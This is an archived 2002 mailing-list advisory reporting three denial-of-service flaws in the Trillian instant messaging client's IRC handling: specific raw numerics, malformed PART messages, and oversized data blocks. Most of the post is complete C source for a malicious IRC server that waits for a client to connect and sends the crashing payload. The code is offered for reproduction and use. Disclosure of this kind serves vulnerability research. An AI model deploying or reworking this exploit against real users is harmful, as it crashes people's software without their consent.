I'm beginning to wonder if the makers of the instant messaging client
Trillian, have done any bounds checking in their code. Personally I like
trillian, its a nice peice of software, on the outside.
Here's three more DoS attacks on trillian, exploitable via a server.
I've included some code which exploits all three.
These were tested on version .74, probably older versions are affected tho.
Multiple Raw flaws:
-------------------
There seems to be a flaw in the way trillian proccesses some IRC Raw
Messages, the following raw's crash Trillian:
206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367
The server sends the raws in the format: ':Server <Num>'
<Num> being the one of the raw codes listed above.
Part flaw:
----------
If trillian receives a message about a user parting a channel it itself is
not in, or if no channel is specified at all, trillian will crash.
Part Messages are sent in the form: ":nick!ident@address PART <Channel>"
Data buffering flaw:
--------------------
There appears to be a flaw in the way trillian buffers data from the IRC
server. If trillian receives a block of data over 4095 bytes, trillian will
crash.
Exploit code to reproduce flaws:
--------------------------------
/* Trillian-Dos.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits Multiple Trillian DoS Flaws:
Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,
352, 367
Part Flaw
Data length flaw.
Tested On Version .74
Compiles with Borland 5.5 Commandline Tools.
These Examples Will Just DoS The Trillian Client,
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
SOCKET s;
#define SERVER ":server "
#define PART ":nick!ident@address PART\n"
int main(int argc, char *argv[]) {
SOCKET TempSock = SOCKET_ERROR;
WSADATA WsaDat;
SOCKADDR_IN Sockaddr;
int nRet;
char payload[4096];
if (argc < 2) {
usage();
return 1;
}
if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) &&
(strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
usage();
return 1;
}
printf("Listening on port 6667 for connections....\n");
if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;
}
/* Create Socket */
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
WSACleanup();
return 0;
}
Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr = INADDR_ANY;
nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
WSACleanup();
return 0;
}
/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
WSACleanup();
return 0;
}
while (TempSock == SOCKET_ERROR) {
TempSock = accept(s, NULL, NULL);
}
printf("Client Connected, Sending Payload\n");
if (!strcmp(argv[1],"part")) {
send(TempSock,PART,strlen(PART),0);
}
if (!strcmp(argv[1],"raw")) {
send(TempSock,SERVER,strlen(SERVER),0);
send(TempSock,argv[2],strlen(argv[2]),0);
send(TempSock,"\n",1,0);
}
if (!strcmp(argv[1],"data")) {
memset(payload,'A',4096);
send(TempSock,payload,strlen(payload),0);
}
printf("Exiting\n");
sleep(100);
WSACleanup();
return 0;
}
usage() {
printf("\nTrillian Multiple DoS Flaws\n");
printf("---------------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74\n\n");
printf("Usage: Trillian-Dos <type> [num]\n");
printf("Type: raw, part, data\n");
printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
333, 352, 367\n\n");
}
--end code--
----
NOTE: Because of the amount of spam i receive, i require all emails directed
*to me* to contain the word "nospam" in the subject line somewhere. Else i
might not get your email. thankyou.
----
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 07:42:27 PDT